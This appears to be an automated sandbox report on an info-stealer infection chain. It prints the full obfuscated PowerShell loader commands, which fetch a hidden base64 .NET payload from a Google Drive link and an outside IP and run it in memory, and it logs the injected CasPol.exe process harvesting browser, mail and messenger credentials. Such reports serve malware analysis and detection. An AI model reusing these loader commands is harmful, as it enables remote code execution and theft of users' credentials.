Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liggjhbzsg9nrvsymv0rjfbzae9trvszmf0rj3gnksgoj1prywltywdlvxjsid0guun4ahqnkyd0chm6ly9kcml2zs5nb29nbguuy29tl3vjp2v4cg9ydd1kb3dubg9hzczpzd0xqulwz0pksnyxrjynkyd2uzrzvu95ym5ilxnedlvoqll3dxiguun4o1pryxdlyknsawvudca9ie5ldy1pymply3qgu3knkydzdgvtlk5ldc5xzwjdbgllbnq7wmthaw1hz2vcjysnexrlcya9ifpryxdlyknsawvudc5eb3dubg9hzerhdgeowmthaw1hz2vvcmwpo1prywltywdlvgv4dca9ifttexn0jysnzw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkfprywltywdlqnl0zxmpo1pryxn0yxj0rmxhzya9iffdedwnkyc8qkftrty0x1nuqvjupj5rq3g7wmthzw5krmxhzya9iffdedw8qkftrty0x0vord4+uun4o1pryxn0yxj0sw5kzxggpsbaa2fpbwfnzvrlehqusw5kzxhpzihaa2fzdgfydezsywcpo1prywvuzeluzgv4id0gwmthaw1hz2vuzxh0lkluzgv4t2yowmthzw5krmxhzycrjyk7wmthc3rhcnrjbmrlecatz2ugmcatyw4nkydkifprywvuzeluzgv4ic1ndcbajysna2fzdccrj2fydeluzgv4o1pryxn0yxj0sw4nkydkzxggkz0gwmthc3rhcnrgbgfnlkxlbmd0adtaa2fiyxnlnjrmzw5ndggnkycgpsbaa2flbmrjbmrlecatifpryxn0yxj0sw5kzxg7wmthymfzzty0q29tbwfuzca9ifprywltywdlvgv4dc5tdwjzdhjpbicrj2cowmthc3rhcnrjbmrlecwgjysnwmthymfzjysnzty0tgvuz3rokttaa2fiyxnlnjrszxzlcnnlzca9ic1qb2luichaa2fiyxnlnjrdb21tyw5kllrvq2hhckfycmf5kckgs041iezvckvhy2gtt2jqzwn0ihsgwmsnkydhxyb9kvstms4ulshaa2fijysnyxmnkydlnjrdb21tyw5klkxlbmd0acldo1prywnvbw1hbmrcexrlcya9ifttexn0zw0ujysnq29udmvydf06okzyb21cyxnljysnnjrtdhjpbmcowmthymfzzty0umv2zxjzzwqpo1prywxvywrlzefzc2vtymx5id0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzchaa2fjb21tyscrj25kqnl0zxmpo1pryxzhau1ldghvzca9iftkbmxpyi5jty5ib21lxs5hzscrj3rnzxrob2qouun4vkfjuun4kttaa2f2ywlnzxrob2qusw52b2tlkfpryw51bgwsieaouun4dhh0lljsrlzhr0zslzc1lzy0ljy0ms40nzeunzaxly86chr0affdecwguun4zgvzyxrpdmfkb1fdecwguumnkyd4zgvzyxrpdmfkb1fdecwguun4zgvzyxrpdmfkb1fdecwguun4q2fzjysnug9suun4lcbrq3hkzxnhdgl2ywrvuscrj0n4lcbrq3hkzxnhdgl2ywrvuun4lffdegrlc2f0axzhzg9rq3gsuun4zgvzyxrpdmfkb1fdecxrq3hkzxnhdgl2ywrvuun4lffdegrlc2f0axzhzg9rq3gsuun4zgvzyxrpdmfkb1fdecxrq3gxuun4lffdegrlc2f0axzhzg9rq3gpktsnks5yrvbmyunlkchby0hhul05mctby0hhul0xmdcrw2niyvjdotcplftzvhjjbmddw2niyvjdmzyplnjfuexhq2uoj0tonscsw3nuckluz11by0hhul0xmjqplnjfuexhq2uokftjsgfsxtgxk1tjsgfsxty3k1tjsgfsxteymcksw3nuckluz11by0hhul0zoskp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( $pshome[21]+$pshome[30]+'x')(('zkaimageurl = qcxht'+'tps://drive.google.com/uc?export=download&id=1aivgjjjv1f6'+'vs4suoybnh-sdvuhbywur qcx;zkawebclient = new-object sy'+'stem.net.webclient;zkaimageb'+'ytes = zkawebclient.downloaddata(zkaimageurl);zkaimagetext = [syst'+'em.text.encoding]::utf8.getstring(zkaimagebytes);zkastartflag = qcx<'+'<base64_start>>qcx;zkaendflag = qcx<<base64_end>>qcx;zkastartindex = zkaimagetext.indexof(zkastartflag);zkaendindex = zkaimagetext.indexof(zkaendflag'+');zkastartindex -ge 0 -an'+'d zkaendindex -gt z'+'kast'+'artindex;zkastartin'+'dex += zkastartflag.length;zkabase64length'+' = zkaendindex - zkastartindex;zkabase64command = zkaimagetext.substrin'+'g(zkastartindex, '+'zkabas'+'e64length);zkabase64reversed = -join (zkabase64command.tochararray() kn5 foreach-object { zk'+'a_ })[-1..-(zkab'+'as'+'e64command.length)];zkacommandbytes = [system.'+'convert]::frombase'+'64string(zkabase64reversed);zkaloadedassembly = [system.reflection.assembly]::load(zkacomma'+'ndbytes);zkavaimethod = [dnlib.io.home].ge'+'tmethod(qcxvaiqcx);zkavaimethod.invoke(zkanull, @(qcxtxt.rrfvggfr/75/64.641.471.701//:ptthqcx, qcxdesativadoqcx, qc'+'xdesativadoqcx, qcxdesativadoqcx, qcxcas'+'polqcx, qcxdesativadoq'+'cx, qcxdesativadoqcx,qcxdesativadoqcx,qcxdesativadoqcx,qcxdesativadoqcx,qcxdesativadoqcx,qcxdesativadoqcx,qcx1qcx,qcxdesativadoqcx));').replace(([char]90+[char]107+[char]97),[string][char]36).replace('kn5',[string][char]124).replace(([char]81+[char]67+[char]120),[string][char]39))"

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 31_2_0041881C GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,

31_2_0041881C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 41_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,

41_2_004082CD

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 31_2_0041739B GetVersionExW,

31_2_0041739B

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Searches for Windows Mail specific files

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db

Tries to steal Instant Messenger accounts or passwords

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Paltalk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
